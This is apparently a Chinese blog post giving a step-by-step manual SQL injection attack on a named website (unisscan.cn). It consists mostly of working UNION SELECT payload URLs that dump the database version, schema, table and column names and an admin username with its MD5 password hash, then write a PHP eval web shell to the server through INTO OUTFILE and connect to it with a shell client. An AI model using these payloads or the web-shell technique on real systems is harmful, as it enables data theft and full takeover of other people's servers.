1. 程式人生 > >MySQL手工注入步驟+直接寫入一句話

MySQL手工注入步驟+直接寫入一句話

(1)判斷注入點



接著通過and 1=1 和 and 1=2測試發現前者正常,後者異常,可以肯定存在注入點,接下來判斷該頁面查詢資料庫的欄位

(2)查詢欄位數

 http://unisscan.cn/list.php?lei=246 order by n-- 
 結果發現有31個欄位


(3)看看哪些欄位可以顯示資訊

http://unisscan.cn/list.php?lei=246 and 1=2 union%20select%201,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29,30,31--


(4)開始收集資訊


http://unisscan.cn/list.php?lei=246 and 1=2 union%20select%201,2,3,4,5,6,7,concat(user(),0x3a,database(),0x3a,version()),9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29,30,31--


[email protected]:uniscan:5.0.67-community-nt
(5)root接連,並且是5.0的,直接爆庫:

http://unisscan.cn/list.php?lei=246 and 1 = 2 union%20select%201,2,3,4,5,6,7,concat(group_concat(distinct+schema_name)),9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29,30,31%20from%20information_schema.schemata--


information_schema,mysql,unis_phpstat,uniscan,unisstat
(6)先找後臺管理員密碼
爆表(uniscan):

http://unisscan.cn/list.php?lei=246 and 1=2 union%20select%201,2,3,4,5,6,7,concat(group_concat(distinct+table_name)),9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29,30,31%20from%20information_schema.tables where table_schema=0x756E697363616E-- 


(7)有admin表,應該是管理表了,看下admin表裡的欄位

http://unisscan.cn/list.php?lei=246 and 1=2  union%20select%201,2,3,4,5,6,7,concat(group_concat(distinct+column_name)),9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29,30,31%20from%20information_schema.columns where table_name=0x61646D696E--


id,username,password,quanxian,zhiwei,quanxian
(8)檢視id,username,password欄位的內容:

http://unisscan.cn/list.php?lei=246 and 1 =2 union%20select%201,2,3,4,5,6,7,concat(id,0x3a,username,0x3a,password),9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29,30,31%20from%20admin limit 0,1--


80:admin:74d1a2ceca6456a14b3a3ecfa0e499ff
上md5解密,結果發現解不開,鬱悶~~~~~
只能放棄後臺拿shell方法了。。。。

(9)既然後臺的方法不行,那就找找看能不能爆出網站的物理路徑,最後竟然找到了phpinfo測試頁面


(10)知道了物理路徑就好辦了   直接寫一句話木馬

http://unisscan.cn/list.php?lei=246 and 1=2 union%20select%201,2,3,4,5,6,7,%27%3C?php%20eval($_POST[cmd])?%3E%27,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29,30,31%20into%20outfile%20%27V:\web\php\php5\PHP_Web\phpstat3.2\one.php%27



(12)用菜刀連線,併成功!